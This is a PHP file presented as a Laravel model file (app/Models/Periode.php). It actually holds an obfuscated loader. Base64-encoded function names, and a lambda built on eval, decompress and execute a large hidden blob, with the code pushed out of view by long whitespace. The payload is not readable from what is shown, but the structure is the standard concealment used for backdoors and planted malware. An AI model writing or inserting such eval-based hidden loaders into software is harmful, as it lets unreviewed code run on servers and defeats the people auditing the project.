<?php 
        $__='printf';$_='Loading app/Models/Periode.php';
        



























































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWltvm0gUfo+0/yEPldyqqxTsOBWK8hCIuTlxArYZ4KViZhzAHjAp8QV+/R7AwXba3W33pm41nzX2mDHn8p1vDpbN6WmDN58AV53sc5w+P3Yu67c7XHWCLPtwt6Qzln94mH2OYXaWRdmpwoI8Pzs761ye7Kyc/nLCHz/O46Qq4+k/iKsvjnRcUco9JMa+Nrjq1If2avgm7KR2dcrBwcHxc6JDEkegrrkyNKfroc3SVKVHt1h8bJomdM2mXX/iVHFwcHBwcHBwcHD838B/zuDg4OD4edHBQT67OP9EZ2RJZ51LzggHBwcHB8ffwvH9BzfWcqQk/QgjpySaOvfHskx0mUyQtPDRtrzfCMMbKxNJdxqO0TanSMxwogq+sx14rh15iVrCXMWatKXIWVF1q3loJOCemfnuiIw1tbQTdU41qZhN8pGSOiX4MLG2FTFiK7DB3IEdUU2NPXcEcyfHPVX0UV9wB+La15y8ioHCmjFgOdad5wD14fMOsTVV8JAZkS7M0XZNXIfh1CZW6mRYsxmZf6c/1WQYbAZIWhFxa8D6yEP9/o6DOayVpJAt3zUz3LWZoTnnEMfK1+/Chq8N+AOf8XVoKHLD2ev8Q2FoKLCuywXu2cyD4SvXiyoerE3Dh/F1TDSnCCp7Y+NjXZ/G3oYkkuADtz6yQlPzIcct8L9lxo0Qos3ObjNisLek6Dy+vd4dV4UjWxSZeYDuQj91VhAD5HMe4q755KPnR9DBk4eey6GyePl8dW7Y2tdNRnWnwHEVd5SRQngfQJ4TpK5m4+jBSzIWiHIUJOrn+/kLb4vWxqNV8dnMie5A3mxuaL6Ik1HNvaGP5rgnM0eToL5by0NUnLacRApFLAddFIZiV5orZuPFhTEwxQBtF75rfD1mxQZN2hFWriVDHW2Ibl3cpzSjWrg0wRdJGGhtmg7HwnvQU17xPE3U3lChm5d6u122uFXkkiJhiROWe4hVXKXUkTYeyqKgWISWcxfSJu5mbUyy20k/hdqJZGD2X9szG152MTej/TuzzU94jzUnoVq2Bu1PKDKWpm6vocb5rXKdvvKXH3GphIsgkTIcL8LZsUbqYdY2z58fEml1GNttUsW2Cc1SSL/00f9aDgf6ELL7F1+6cKh5EfSaeYWcUNSHPcHWOJZLryttfKfJx0rUvuea7R4b7usamjrsUxc4nCzDdo+3tvMjDk3NjGZILaq9Me2B3m+WF7TLhEAJ0/3+qmtTQp+r9uHYc8mBFpzHAFk5aFHE42gFMURBXWcqur1G20PoldNCbnSlStBPWETiP63380NKl3CMwVoJOUOt7yqOi+Fhf6iHXPiuLZLkvM0dbIM2faGuKRuJXhwuvJozIzcU+jqWf1ULO7+rlk9HynyF7Gvf5CDVeTV7UjrQ+noY73U/jGXdd60Q7ELMUmLo9hL6dgnXIgFyWJNYFgLoj20fsFofT3vtgS7a3iSTb7xejaH+Ua3FtLle1X3swP7t5o/1W8UIvRJ6UBQRQYxw+pf65qSy83v9shqdy5OT//6LwlX9+nb37t3l95x+cO63nPhm7/Btp3ru/Nq65fdB/pj3QR7X7u2RWJrSvbv8DaF27yA=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































                                                                                                                                                                                                                     $________;
